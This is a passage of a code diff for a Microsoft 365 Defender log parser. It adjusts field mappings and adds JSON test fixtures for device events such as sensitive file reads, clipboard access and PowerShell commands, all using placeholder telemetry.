           action.properties.RemoteDeviceName: "{{json_event.message.properties.RemoteDeviceName}}"
-          action.properties.ProcessTokenElevation: "{{json_event.message.properties.ProcessTokenElevation}}"
+          #action.properties.ProcessTokenElevation: "{{json_event.message.properties.ProcessTokenElevation}}"
   set_device_file_certificate_info_fields:
     actions:
       - set:
@@ -469,15 +531,15 @@ stages:
       - set:
           event.dataset: "device_process_events"
           event.category: ["process"]
-          process.code_signature.status: "{{json_event.message.properties.InitiatingProcessSignatureStatus}}"
-          process.code_signature.subject_name: "{{json_event.message.properties.InitiatingProcessSignerType}}"
-          action.properties.ProcessIntegrityLevel: "{{json_event.message.properties.ProcessIntegrityLevel}}"
-          action.properties.ProcessVersionInfoCompanyName: "{{json_event.message.properties.ProcessVersionInfoCompanyName}}"
-          action.properties.ProcessVersionInfoFileDescription: "{{json_event.message.properties.ProcessVersionInfoFileDescription}}"
-          action.properties.ProcessVersionInfoInternalFileName: "{{json_event.message.properties.ProcessVersionInfoInternalFileName}}"
-          action.properties.ProcessVersionInfoOriginalFileName: "{{json_event.message.properties.ProcessVersionInfoOriginalFileName}}"
-          action.properties.ProcessVersionInfoProductName: "{{json_event.message.properties.ProcessVersionInfoProductName}}"
-          action.properties.ProcessVersionInfoProductVersion: "{{json_event.message.properties.ProcessVersionInfoProductVersion}}"
+          #process.code_signature.status: "{{json_event.message.properties.InitiatingProcessSignatureStatus}}"
+          #process.code_signature.subject_name: "{{json_event.message.properties.InitiatingProcessSignerType}}"
+          #action.properties.ProcessIntegrityLevel: "{{json_event.message.properties.ProcessIntegrityLevel}}"
+          #action.properties.ProcessVersionInfoCompanyName: "{{json_event.message.properties.ProcessVersionInfoCompanyName}}"
+          #action.properties.ProcessVersionInfoFileDescription: "{{json_event.message.properties.ProcessVersionInfoFileDescription}}"
+          #action.properties.ProcessVersionInfoInternalFileName: "{{json_event.message.properties.ProcessVersionInfoInternalFileName}}"
+          #action.properties.ProcessVersionInfoOriginalFileName: "{{json_event.message.properties.ProcessVersionInfoOriginalFileName}}"
+          #action.properties.ProcessVersionInfoProductName: "{{json_event.message.properties.ProcessVersionInfoProductName}}"
+          #action.properties.ProcessVersionInfoProductVersion: "{{json_event.message.properties.ProcessVersionInfoProductVersion}}"
   set_device_registry_events_fields:
     actions:
       - set:
diff --git a/Microsoft/microsoft-365-defender/tests/test_device_event.json b/Microsoft/microsoft-365-defender/tests/test_device_event.json
index ca708b0ed..17cad5081 100644
--- a/Microsoft/microsoft-365-defender/tests/test_device_event.json
+++ b/Microsoft/microsoft-365-defender/tests/test_device_event.json
@@ -16,16 +16,18 @@
     "@timestamp": "2022-09-01T07:09:47.498056Z",
     "action": {
       "properties": {
-        "InitiatingProcessAccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2",
-        "InitiatingProcessCommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2",
-        "InitiatingProcessFileSize": 14687048,
-        "InitiatingProcessLogonId": "121834210",
-        "InitiatingProcessVersionInfoCompanyName": "Google",
-        "InitiatingProcessVersionInfoFileDescription": "Software Reporter Tool",
-        "InitiatingProcessVersionInfoInternalFileName": "software_reporter_tool_exe",
-        "InitiatingProcessVersionInfoOriginalFileName": "software_reporter_tool.exe",
-        "InitiatingProcessVersionInfoProductName": "Software Reporter Tool",
-        "InitiatingProcessVersionInfoProductVersion": "102.286.200"
+        "process": {
+          "AccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2",
+          "CommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2",
+          "FileSize": 14687048,
+          "LogonId": "121834210",
+          "VersionInfoCompanyName": "Google",
+          "VersionInfoFileDescription": "Software Reporter Tool",
+          "VersionInfoInternalFileName": "software_reporter_tool_exe",
+          "VersionInfoOriginalFileName": "software_reporter_tool.exe",
+          "VersionInfoProductName": "Software Reporter Tool",
+          "VersionInfoProductVersion": "102.286.200"
+        }
       },
       "type": "NtAllocateVirtualMemoryApiCall"
     },
diff --git a/Microsoft/microsoft-365-defender/tests/test_device_event_sensitive_file_read.json b/Microsoft/microsoft-365-defender/tests/test_device_event_sensitive_file_read.json
new file mode 100644
index 000000000..fedd99aea
--- /dev/null
+++ b/Microsoft/microsoft-365-defender/tests/test_device_event_sensitive_file_read.json
@@ -0,0 +1,100 @@
+{
+  "input": {
+    "message": "{\"time\":\"2024-11-12T10:18:48.4363168Z\",\"tenantId\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-DeviceEvents\",\"_TimeReceivedBySvc\":\"2024-11-12T10:18:28.1484017Z\",\"properties\":{\"DeviceId\":\"abcdef0123456789\",\"DeviceName\":\"user.company.local\",\"ReportId\":73291,\"InitiatingProcessId\":1328,\"InitiatingProcessCreationTime\":\"2024-11-12T10:17:23.9905327Z\",\"InitiatingProcessCommandLine\":\"\\\"Browser.exe\\\" /Ticket 12345678-1234-5678-9012-345678901234 /ProjectID 123456789 /Network 0 /DBMode 0\",\"InitiatingProcessParentFileName\":\"Windows.exe\",\"InitiatingProcessParentId\":1820,\"InitiatingProcessParentCreationTime\":\"2024-10-14T05:47:54.3243814Z\",\"InitiatingProcessSHA1\":\"44543e0c6f30415c670c1322e61ca68602d58708\",\"InitiatingProcessMD5\":\"51a9cac9c4e8da44ffd7502be17604ee\",\"InitiatingProcessFileName\":\"browser.exe\",\"InitiatingProcessFolderPath\":\"c:\\\\program files (x86)\\\\browser.exe\",\"InitiatingProcessAccountName\":\"username\",\"InitiatingProcessAccountDomain\":\"company\",\"SHA1\":null,\"MD5\":null,\"FileName\":\"FileName.mdb\",\"FolderPath\":\"C:\\\\Log\",\"AccountName\":null,\"AccountDomain\":null,\"AdditionalFields\":null,\"InitiatingProcessAccountSid\":\"S-1-2-3\",\"AppGuardContainerId\":\"\",\"InitiatingProcessSHA256\":\"eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232\",\"SHA256\":null,\"RemoteUrl\":null,\"ProcessCreationTime\":null,\"ProcessTokenElevation\":null,\"ActionType\":\"SensitiveFileRead\",\"FileOriginUrl\":null,\"FileOriginIP\":null,\"InitiatingProcessLogonId\":5223047,\"AccountSid\":\"S-1-2-3\",\"RemoteDeviceName\":null,\"RegistryKey\":null,\"RegistryValueName\":null,\"RegistryValueData\":null,\"LogonId\":null,\"LocalIP\":null,\"LocalPort\":null,\"RemoteIP\":null,\"RemotePort\":null,\"ProcessId\":null,\"ProcessCommandLine\":null,\"InitiatingProcessAccountUpn\":\"USERNAME@COMPANY.COM\",\"InitiatingProcessAccountObjectId\":\"12345678-abcd-1234-ef09-abcdef123456\",\"FileSize\":286720,\"InitiatingProcessFileSize\":3316224,\"InitiatingProcessVersionInfoCompanyName\":\"Test Corporation\",\"InitiatingProcessVersionInfoProductName\":\"Test Product\",\"InitiatingProcessVersionInfoProductVersion\":\"1, 0, 0, 1\",\"InitiatingProcessVersionInfoInternalFileName\":\"Browser.EXE\",\"InitiatingProcessVersionInfoOriginalFileName\":\"Browser.EXE\",\"InitiatingProcessVersionInfoFileDescription\":\"Browser EXE\",\"InitiatingProcessSessionId\":1,\"IsInitiatingProcessRemoteSession\":false,\"InitiatingProcessRemoteSessionDeviceName\":null,\"InitiatingProcessRemoteSessionIP\":null,\"CreatedProcessSessionId\":null,\"IsProcessRemoteSession\":false,\"ProcessRemoteSessionDeviceName\":null,\"ProcessRemoteSessionIP\":null,\"Timestamp\":\"2024-11-12T10:17:24.8588296Z\",\"MachineGroup\":\"PC\"},\"Tenant\":\"DefaultTenant\"}",
+    "sekoiaio": {
+      "intake": {
+        "dialect": "Microsoft 365 Defender",
+        "dialect_uuid": "05e6f36d-cee0-4f06-b575-9e43af779f9f"
+      }
+    }
+  },
+  "expected": {
+    "message": "{\"time\":\"2024-11-12T10:18:48.4363168Z\",\"tenantId\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-DeviceEvents\",\"_TimeReceivedBySvc\":\"2024-11-12T10:18:28.1484017Z\",\"properties\":{\"DeviceId\":\"abcdef0123456789\",\"DeviceName\":\"user.company.local\",\"ReportId\":73291,\"InitiatingProcessId\":1328,\"InitiatingProcessCreationTime\":\"2024-11-12T10:17:23.9905327Z\",\"InitiatingProcessCommandLine\":\"\\\"Browser.exe\\\" /Ticket 12345678-1234-5678-9012-345678901234 /ProjectID 123456789 /Network 0 /DBMode 0\",\"InitiatingProcessParentFileName\":\"Windows.exe\",\"InitiatingProcessParentId\":1820,\"InitiatingProcessParentCreationTime\":\"2024-10-14T05:47:54.3243814Z\",\"InitiatingProcessSHA1\":\"44543e0c6f30415c670c1322e61ca68602d58708\",\"InitiatingProcessMD5\":\"51a9cac9c4e8da44ffd7502be17604ee\",\"InitiatingProcessFileName\":\"browser.exe\",\"InitiatingProcessFolderPath\":\"c:\\\\program files (x86)\\\\browser.exe\",\"InitiatingProcessAccountName\":\"username\",\"InitiatingProcessAccountDomain\":\"company\",\"SHA1\":null,\"MD5\":null,\"FileName\":\"FileName.mdb\",\"FolderPath\":\"C:\\\\Log\",\"AccountName\":null,\"AccountDomain\":null,\"AdditionalFields\":null,\"InitiatingProcessAccountSid\":\"S-1-2-3\",\"AppGuardContainerId\":\"\",\"InitiatingProcessSHA256\":\"eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232\",\"SHA256\":null,\"RemoteUrl\":null,\"ProcessCreationTime\":null,\"ProcessTokenElevation\":null,\"ActionType\":\"SensitiveFileRead\",\"FileOriginUrl\":null,\"FileOriginIP\":null,\"InitiatingProcessLogonId\":5223047,\"AccountSid\":\"S-1-2-3\",\"RemoteDeviceName\":null,\"RegistryKey\":null,\"RegistryValueName\":null,\"RegistryValueData\":null,\"LogonId\":null,\"LocalIP\":null,\"LocalPort\":null,\"RemoteIP\":null,\"RemotePort\":null,\"ProcessId\":null,\"ProcessCommandLine\":null,\"InitiatingProcessAccountUpn\":\"USERNAME@COMPANY.COM\",\"InitiatingProcessAccountObjectId\":\"12345678-abcd-1234-ef09-abcdef123456\",\"FileSize\":286720,\"InitiatingProcessFileSize\":3316224,\"InitiatingProcessVersionInfoCompanyName\":\"Test Corporation\",\"InitiatingProcessVersionInfoProductName\":\"Test Product\",\"InitiatingProcessVersionInfoProductVersion\":\"1, 0, 0, 1\",\"InitiatingProcessVersionInfoInternalFileName\":\"Browser.EXE\",\"InitiatingProcessVersionInfoOriginalFileName\":\"Browser.EXE\",\"InitiatingProcessVersionInfoFileDescription\":\"Browser EXE\",\"InitiatingProcessSessionId\":1,\"IsInitiatingProcessRemoteSession\":false,\"InitiatingProcessRemoteSessionDeviceName\":null,\"InitiatingProcessRemoteSessionIP\":null,\"CreatedProcessSessionId\":null,\"IsProcessRemoteSession\":false,\"ProcessRemoteSessionDeviceName\":null,\"ProcessRemoteSessionIP\":null,\"Timestamp\":\"2024-11-12T10:17:24.8588296Z\",\"MachineGroup\":\"PC\"},\"Tenant\":\"DefaultTenant\"}",
+    "event": {
+      "category": [
+        "host"
+      ],
+      "dataset": "device_events",
+      "type": [
+        "info"
+      ]
+    },
+    "@timestamp": "2024-11-12T10:17:24.858829Z",
+    "action": {
+      "properties": {
+        "AccountSid": "S-1-2-3",
+        "process": {
+          "parent": {
+            "AccountObjectId": "12345678-abcd-1234-ef09-abcdef123456",
+            "CommandLine": "\"Browser.exe\" /Ticket 12345678-1234-5678-9012-345678901234 /ProjectID 123456789 /Network 0 /DBMode 0",
+            "FileSize": 3316224,
+            "LogonId": "5223047",
+            "VersionInfoCompanyName": "Test Corporation",
+            "VersionInfoFileDescription": "Browser EXE",
+            "VersionInfoInternalFileName": "Browser.EXE",
+            "VersionInfoOriginalFileName": "Browser.EXE",
+            "VersionInfoProductName": "Test Product",
+            "VersionInfoProductVersion": "1, 0, 0, 1"
+          }
+        }
+      },
+      "type": "SensitiveFileRead"
+    },
+    "file": {
+      "directory": "C:\\Log",
+      "name": "FileName.mdb",
+      "size": 286720
+    },
+    "host": {
+      "id": "abcdef0123456789",
+      "name": "user.company.local"
+    },
+    "microsoft": {
+      "defender": {
+        "report": {
+          "id": "73291"
+        }
+      }
+    },
+    "process": {
+      "name": "FileName.mdb",
+      "parent": {
+        "args": [
+          "/DBMode",
+          "/Network",
+          "/ProjectID",
+          "/Ticket",
+          "0",
+          "0",
+          "12345678-1234-5678-9012-345678901234",
+          "123456789"
+        ],
+        "command_line": "\"Browser.exe\" /Ticket 12345678-1234-5678-9012-345678901234 /ProjectID 123456789 /Network 0 /DBMode 0",
+        "executable": "c:\\program files (x86)\\browser.exe",
+        "hash": {
+          "md5": "51a9cac9c4e8da44ffd7502be17604ee",
+          "sha1": "44543e0c6f30415c670c1322e61ca68602d58708",
+          "sha256": "eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232"
+        },
+        "name": "browser.exe",
+        "pid": 1328,
+        "start": "2024-11-12T10:17:23.990532Z",
+        "user": {
+          "domain": "company",
+          "email": "USERNAME@COMPANY.COM",
+          "id": "S-1-2-3",
+          "name": "username"
+        },
+        "working_directory": "c:\\program files (x86)"
+      },
+      "working_directory": "C:"
+    },
+    "related": {
+      "hash": [
+        "44543e0c6f30415c670c1322e61ca68602d58708",
+        "51a9cac9c4e8da44ffd7502be17604ee",
+        "eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232"
+      ]
+    }
+  }
+}
\ No newline at end of file
diff --git a/Microsoft/microsoft-365-defender/tests/test_deivce_events_2.json b/Microsoft/microsoft-365-defender/tests/test_device_events_2.json
similarity index 98%
rename from Microsoft/microsoft-365-defender/tests/test_deivce_events_2.json
rename to Microsoft/microsoft-365-defender/tests/test_device_events_2.json
index 1f1351d52..494baa569 100644
--- a/Microsoft/microsoft-365-defender/tests/test_deivce_events_2.json
+++ b/Microsoft/microsoft-365-defender/tests/test_device_events_2.json
@@ -16,7 +16,11 @@
     "@timestamp": "2024-10-22T15:09:08.851712Z",
     "action": {
       "properties": {
-        "InitiatingProcessLogonId": "0"
+        "process": {
+          "parent": {
+            "LogonId": "0"
+          }
+        }
       },
       "type": "ScriptContent"
     },
@@ -38,10 +42,9 @@
     },
     "process": {
       "parent": {
-        "pid": 0
-      },
-      "pid": 417271,
-      "start": "2024-10-22T15:09:08.624070Z"
+        "pid": 417271,
+        "start": "2024-10-22T15:09:08.624070Z"
+      }
     },
     "related": {
       "hash": [
diff --git a/Microsoft/microsoft-365-defender/tests/test_device_events_get_clipboard_data.json b/Microsoft/microsoft-365-defender/tests/test_device_events_get_clipboard_data.json
new file mode 100644
index 000000000..c34cefa50
--- /dev/null
+++ b/Microsoft/microsoft-365-defender/tests/test_device_events_get_clipboard_data.json
@@ -0,0 +1,83 @@
+{
+  "input": {
+    "message": "{\"time\":\"2024-11-12T09:49:58.3460812Z\",\"tenantId\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-DeviceEvents\",\"_TimeReceivedBySvc\":\"2024-11-12T09:49:02.3098089Z\",\"properties\":{\"DeviceId\":\"abcdef0123456789\",\"DeviceName\":\"device.company.fr\",\"ReportId\":157950,\"InitiatingProcessId\":12824,\"InitiatingProcessCreationTime\":\"2024-11-12T10:09:31.1004556Z\",\"InitiatingProcessCommandLine\":\"\\\"OUTLOOK.EXE\\\" \",\"InitiatingProcessParentFileName\":\"exec.exe\",\"InitiatingProcessParentId\":18840,\"InitiatingProcessParentCreationTime\":\"2024-11-12T08:44:15.1503958Z\",\"InitiatingProcessSHA1\":\"44543e0c6f30415c670c1322e61ca68602d58708\",\"InitiatingProcessMD5\":\"51a9cac9c4e8da44ffd7502be17604ee\",\"InitiatingProcessFileName\":\"outlook.exe\",\"InitiatingProcessFolderPath\":\"c:\\\\program files\\\\microsoft office\\\\root\\\\outlook.exe\",\"InitiatingProcessAccountName\":\"john.doe\",\"InitiatingProcessAccountDomain\":\"account-domain\",\"SHA1\":null,\"MD5\":null,\"FileName\":null,\"FolderPath\":null,\"AccountName\":null,\"AccountDomain\":null,\"AdditionalFields\":null,\"InitiatingProcessAccountSid\":\"S-1-2-3\",\"AppGuardContainerId\":\"\",\"InitiatingProcessSHA256\":\"eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232\",\"SHA256\":null,\"RemoteUrl\":null,\"ProcessCreationTime\":null,\"ProcessTokenElevation\":null,\"ActionType\":\"GetClipboardData\",\"FileOriginUrl\":null,\"FileOriginIP\":null,\"InitiatingProcessLogonId\":389220681,\"AccountSid\":null,\"RemoteDeviceName\":null,\"RegistryKey\":null,\"RegistryValueName\":null,\"RegistryValueData\":null,\"LogonId\":null,\"LocalIP\":null,\"LocalPort\":null,\"RemoteIP\":null,\"RemotePort\":null,\"ProcessId\":null,\"ProcessCommandLine\":null,\"InitiatingProcessAccountUpn\":\"john.doe@account-domain.fr\",\"InitiatingProcessAccountObjectId\":\"12345678-abcd-1234-efab-56789123abcd\",\"FileSize\":null,\"InitiatingProcessFileSize\":44152968,\"InitiatingProcessVersionInfoCompanyName\":\"Microsoft Corporation\",\"InitiatingProcessVersionInfoProductName\":\"Microsoft Outlook\",\"InitiatingProcessVersionInfoProductVersion\":\"16.0.17928.20216\",\"InitiatingProcessVersionInfoInternalFileName\":\"Outlook\",\"InitiatingProcessVersionInfoOriginalFileName\":\"Outlook.exe\",\"InitiatingProcessVersionInfoFileDescription\":\"Microsoft Outlook\",\"InitiatingProcessSessionId\":12,\"IsInitiatingProcessRemoteSession\":false,\"InitiatingProcessRemoteSessionDeviceName\":null,\"InitiatingProcessRemoteSessionIP\":null,\"CreatedProcessSessionId\":null,\"IsProcessRemoteSession\":false,\"ProcessRemoteSessionDeviceName\":null,\"ProcessRemoteSessionIP\":null,\"Timestamp\":\"2024-11-12T10:19:26.5027772Z\",\"MachineGroup\":\"All_Win10_11\"},\"Tenant\":\"DefaultTenant\"}",
+    "sekoiaio": {
+      "intake": {
+        "dialect": "Microsoft 365 Defender",
+        "dialect_uuid": "05e6f36d-cee0-4f06-b575-9e43af779f9f"
+      }
+    }
+  },
+  "expected": {
+    "message": "{\"time\":\"2024-11-12T09:49:58.3460812Z\",\"tenantId\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-DeviceEvents\",\"_TimeReceivedBySvc\":\"2024-11-12T09:49:02.3098089Z\",\"properties\":{\"DeviceId\":\"abcdef0123456789\",\"DeviceName\":\"device.company.fr\",\"ReportId\":157950,\"InitiatingProcessId\":12824,\"InitiatingProcessCreationTime\":\"2024-11-12T10:09:31.1004556Z\",\"InitiatingProcessCommandLine\":\"\\\"OUTLOOK.EXE\\\" \",\"InitiatingProcessParentFileName\":\"exec.exe\",\"InitiatingProcessParentId\":18840,\"InitiatingProcessParentCreationTime\":\"2024-11-12T08:44:15.1503958Z\",\"InitiatingProcessSHA1\":\"44543e0c6f30415c670c1322e61ca68602d58708\",\"InitiatingProcessMD5\":\"51a9cac9c4e8da44ffd7502be17604ee\",\"InitiatingProcessFileName\":\"outlook.exe\",\"InitiatingProcessFolderPath\":\"c:\\\\program files\\\\microsoft office\\\\root\\\\outlook.exe\",\"InitiatingProcessAccountName\":\"john.doe\",\"InitiatingProcessAccountDomain\":\"account-domain\",\"SHA1\":null,\"MD5\":null,\"FileName\":null,\"FolderPath\":null,\"AccountName\":null,\"AccountDomain\":null,\"AdditionalFields\":null,\"InitiatingProcessAccountSid\":\"S-1-2-3\",\"AppGuardContainerId\":\"\",\"InitiatingProcessSHA256\":\"eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232\",\"SHA256\":null,\"RemoteUrl\":null,\"ProcessCreationTime\":null,\"ProcessTokenElevation\":null,\"ActionType\":\"GetClipboardData\",\"FileOriginUrl\":null,\"FileOriginIP\":null,\"InitiatingProcessLogonId\":389220681,\"AccountSid\":null,\"RemoteDeviceName\":null,\"RegistryKey\":null,\"RegistryValueName\":null,\"RegistryValueData\":null,\"LogonId\":null,\"LocalIP\":null,\"LocalPort\":null,\"RemoteIP\":null,\"RemotePort\":null,\"ProcessId\":null,\"ProcessCommandLine\":null,\"InitiatingProcessAccountUpn\":\"john.doe@account-domain.fr\",\"InitiatingProcessAccountObjectId\":\"12345678-abcd-1234-efab-56789123abcd\",\"FileSize\":null,\"InitiatingProcessFileSize\":44152968,\"InitiatingProcessVersionInfoCompanyName\":\"Microsoft Corporation\",\"InitiatingProcessVersionInfoProductName\":\"Microsoft Outlook\",\"InitiatingProcessVersionInfoProductVersion\":\"16.0.17928.20216\",\"InitiatingProcessVersionInfoInternalFileName\":\"Outlook\",\"InitiatingProcessVersionInfoOriginalFileName\":\"Outlook.exe\",\"InitiatingProcessVersionInfoFileDescription\":\"Microsoft Outlook\",\"InitiatingProcessSessionId\":12,\"IsInitiatingProcessRemoteSession\":false,\"InitiatingProcessRemoteSessionDeviceName\":null,\"InitiatingProcessRemoteSessionIP\":null,\"CreatedProcessSessionId\":null,\"IsProcessRemoteSession\":false,\"ProcessRemoteSessionDeviceName\":null,\"ProcessRemoteSessionIP\":null,\"Timestamp\":\"2024-11-12T10:19:26.5027772Z\",\"MachineGroup\":\"All_Win10_11\"},\"Tenant\":\"DefaultTenant\"}",
+    "event": {
+      "category": [
+        "host"
+      ],
+      "dataset": "device_events",
+      "type": [
+        "info"
+      ]
+    },
+    "@timestamp": "2024-11-12T10:19:26.502777Z",
+    "action": {
+      "properties": {
+        "process": {
+          "AccountObjectId": "12345678-abcd-1234-efab-56789123abcd",
+          "CommandLine": "\"OUTLOOK.EXE\" ",
+          "FileSize": 44152968,
+          "LogonId": "389220681",
+          "VersionInfoCompanyName": "Microsoft Corporation",
+          "VersionInfoFileDescription": "Microsoft Outlook",
+          "VersionInfoInternalFileName": "Outlook",
+          "VersionInfoOriginalFileName": "Outlook.exe",
+          "VersionInfoProductName": "Microsoft Outlook",
+          "VersionInfoProductVersion": "16.0.17928.20216"
+        }
+      },
+      "type": "GetClipboardData"
+    },
+    "host": {
+      "id": "abcdef0123456789",
+      "name": "device.company.fr"
+    },
+    "microsoft": {
+      "defender": {
+        "report": {
+          "id": "157950"
+        }
+      }
+    },
+    "process": {
+      "command_line": "\"OUTLOOK.EXE\" ",
+      "executable": "c:\\program files\\microsoft office\\root\\outlook.exe",
+      "hash": {
+        "md5": "51a9cac9c4e8da44ffd7502be17604ee",
+        "sha1": "44543e0c6f30415c670c1322e61ca68602d58708",
+        "sha256": "eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232"
+      },
+      "name": "outlook.exe",
+      "parent": {
+        "name": "exec.exe",
+        "pid": 18840,
+        "start": "2024-11-12T08:44:15.150395Z"
+      },
+      "pid": 12824,
+      "start": "2024-11-12T10:09:31.100455Z",
+      "user": {
+        "domain": "account-domain",
+        "email": "john.doe@account-domain.fr",
+        "id": "S-1-2-3",
+        "name": "john.doe"
+      },
+      "working_directory": "c:\\program files\\microsoft office\\root"
+    },
+    "related": {
+      "hash": [
+        "44543e0c6f30415c670c1322e61ca68602d58708",
+        "51a9cac9c4e8da44ffd7502be17604ee",
+        "eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232"
+      ]
+    }
+  }
+}
\ No newline at end of file
diff --git a/Microsoft/microsoft-365-defender/tests/test_device_events_powershell_command.json b/Microsoft/microsoft-365-defender/tests/test_device_events_powershell_command.json
new file mode 100644
index 000000000..ea0ddb0df
--- /dev/null
+++ b/Microsoft/microsoft-365-defender/tests/test_device_events_powershell_command.json
@@ -0,0 +1,83 @@
+{
+  "input": {
+    "message": "{\"time\":\"2024-11-12T10:18:46.3194193Z\",\"tenantId\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-DeviceEvents\",\"_TimeReceivedBySvc\":\"2024-11-12T10:17:19.1406475Z\",\"properties\":{\"DeviceId\":\"abcdef0123456789\",\"DeviceName\":\"device.name.fr\",\"ReportId\":134294,\"InitiatingProcessId\":27568,\"InitiatingProcessCreationTime\":\"2024-11-12T10:15:16.4871111Z\",\"InitiatingProcessCommandLine\":\"powershell.exe\",\"InitiatingProcessParentFileName\":\"WindowsTerminal.exe\",\"InitiatingProcessParentId\":884,\"InitiatingProcessParentCreationTime\":\"2024-11-12T09:20:42.8246765Z\",\"InitiatingProcessSHA1\":\"44543e0c6f30415c670c1322e61ca68602d58708\",\"InitiatingProcessMD5\":\"51a9cac9c4e8da44ffd7502be17604ee\",\"InitiatingProcessFileName\":\"powershell.exe\",\"InitiatingProcessFolderPath\":\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"InitiatingProcessAccountName\":\"jdoe\",\"InitiatingProcessAccountDomain\":\"domain\",\"SHA1\":null,\"MD5\":null,\"FileName\":null,\"FolderPath\":null,\"AccountName\":null,\"AccountDomain\":null,\"AdditionalFields\":\"{\\\"Command\\\":\\\"nslookup.exe user01-domain.USER01.local 1.2.3.4\\\"}\",\"InitiatingProcessAccountSid\":\"S-1-2-3\",\"AppGuardContainerId\":\"\",\"InitiatingProcessSHA256\":\"eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232\",\"SHA256\":null,\"RemoteUrl\":null,\"ProcessCreationTime\":null,\"ProcessTokenElevation\":null,\"ActionType\":\"PowerShellCommand\",\"FileOriginUrl\":null,\"FileOriginIP\":null,\"InitiatingProcessLogonId\":398124703,\"AccountSid\":null,\"RemoteDeviceName\":null,\"RegistryKey\":null,\"RegistryValueName\":null,\"RegistryValueData\":null,\"LogonId\":null,\"LocalIP\":null,\"LocalPort\":null,\"RemoteIP\":null,\"RemotePort\":null,\"ProcessId\":null,\"ProcessCommandLine\":null,\"InitiatingProcessAccountUpn\":\"JDOE@domain.fr\",\"InitiatingProcessAccountObjectId\":\"abcdef90-1234-5678-abcd-ef0123456789\",\"FileSize\":null,\"InitiatingProcessFileSize\":450560,\"InitiatingProcessVersionInfoCompanyName\":\"Microsoft Corporation\",\"InitiatingProcessVersionInfoProductName\":\"Microsoft\u00ae Windows\u00ae Operating System\",\"InitiatingProcessVersionInfoProductVersion\":\"10.0.22621.3085\",\"InitiatingProcessVersionInfoInternalFileName\":\"POWERSHELL\",\"InitiatingProcessVersionInfoOriginalFileName\":\"PowerShell.EXE\",\"InitiatingProcessVersionInfoFileDescription\":\"Windows PowerShell\",\"InitiatingProcessSessionId\":6,\"IsInitiatingProcessRemoteSession\":false,\"InitiatingProcessRemoteSessionDeviceName\":null,\"InitiatingProcessRemoteSessionIP\":null,\"CreatedProcessSessionId\":null,\"IsProcessRemoteSession\":false,\"ProcessRemoteSessionDeviceName\":null,\"ProcessRemoteSessionIP\":null,\"Timestamp\":\"2024-11-12T10:15:59.5508823Z\",\"MachineGroup\":\"UnassignedGroup\"},\"Tenant\":\"DefaultTenant\"}",
+    "sekoiaio": {
+      "intake": {
+        "dialect": "Microsoft 365 Defender",
+        "dialect_uuid": "05e6f36d-cee0-4f06-b575-9e43af779f9f"
+      }
+    }
+  },
+  "expected": {
+    "message": "{\"time\":\"2024-11-12T10:18:46.3194193Z\",\"tenantId\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-DeviceEvents\",\"_TimeReceivedBySvc\":\"2024-11-12T10:17:19.1406475Z\",\"properties\":{\"DeviceId\":\"abcdef0123456789\",\"DeviceName\":\"device.name.fr\",\"ReportId\":134294,\"InitiatingProcessId\":27568,\"InitiatingProcessCreationTime\":\"2024-11-12T10:15:16.4871111Z\",\"InitiatingProcessCommandLine\":\"powershell.exe\",\"InitiatingProcessParentFileName\":\"WindowsTerminal.exe\",\"InitiatingProcessParentId\":884,\"InitiatingProcessParentCreationTime\":\"2024-11-12T09:20:42.8246765Z\",\"InitiatingProcessSHA1\":\"44543e0c6f30415c670c1322e61ca68602d58708\",\"InitiatingProcessMD5\":\"51a9cac9c4e8da44ffd7502be17604ee\",\"InitiatingProcessFileName\":\"powershell.exe\",\"InitiatingProcessFolderPath\":\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"InitiatingProcessAccountName\":\"jdoe\",\"InitiatingProcessAccountDomain\":\"domain\",\"SHA1\":null,\"MD5\":null,\"FileName\":null,\"FolderPath\":null,\"AccountName\":null,\"AccountDomain\":null,\"AdditionalFields\":\"{\\\"Command\\\":\\\"nslookup.exe user01-domain.USER01.local 